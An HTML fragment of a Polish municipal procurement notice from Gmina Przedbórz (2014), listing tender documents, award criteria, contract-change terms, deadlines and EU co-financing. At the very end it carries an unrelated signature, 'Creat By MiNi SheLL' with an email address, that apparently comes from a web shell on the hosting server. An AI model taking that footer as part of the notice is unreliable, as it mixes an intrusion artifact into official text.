<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenie o spełnieniu warunków udziału w postępowaniu wg wzoru stanowiącego załącznik nr 2 do siwz</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 50</li>
<li>2 - Doświadczenie - 30</li>
<li>3 - Kwalifikacje - 20</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zgodnie z art. 144 ust. 1 ustawy PZP Zamawiający przewiduje możliwość wprowadzenia zmian do umowy w zakresie:
a)	Zmian w terminach realizacji zajęć, w szczególności wydłużenie okresu świadczenia usługi o którym mowa w par. 1 ust. 3 umowy,
b)	 Zmniejszenia zakresu świadczenia usługi oraz dostaw,
- zgodnie z umową o dofinansowanie projektu i aktualnym wnioskiem o dofinansowanie projektu.
2. Zmiany i uzupełnienia postanowień niniejszej umowy wymagają formy pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://przetargi.ipzp.pl/urzadmiejski_przedbo<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Przedbórz 
Ul. Mostowa 29
97-570 Przedbórz
pokój nr 7 - Referat Infrastruktury, Rolnictwa, Środowiska i Zamówień Publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.08.2014 godzina 13:00, miejsce: Gmina Przedbórz 
Ul. Mostowa 29
97-570 Przedbórz
pokój nr 1 - Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Inwestycja realizowana przy współfinansowaniu ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com